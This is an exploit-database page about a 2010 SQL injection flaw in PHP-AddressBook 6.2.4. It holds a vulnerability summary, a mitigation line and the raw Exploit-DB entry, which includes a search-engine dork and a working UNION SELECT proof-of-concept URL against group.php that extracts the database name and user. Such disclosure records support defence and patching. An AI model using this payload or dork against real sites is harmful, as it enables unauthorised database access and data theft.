header-logo
Suggest Exploit
vendor:
PHP-AddressBook
by:
hiphop
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-AddressBook
Affected Version From: 6.2.4
Affected Version To: 6.2.4
Patch Exists: NO
Related CWE: N/A
CPE: a:php-addressbook:php-addressbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES

PHP-AddressBook v6.2.4 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information such as the database name, user name, and other information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'group_name' parameter of the 'group.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a maliciously crafted SQL query to the vulnerable server. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'

Navigation

Suggest Exploit

Services By CQR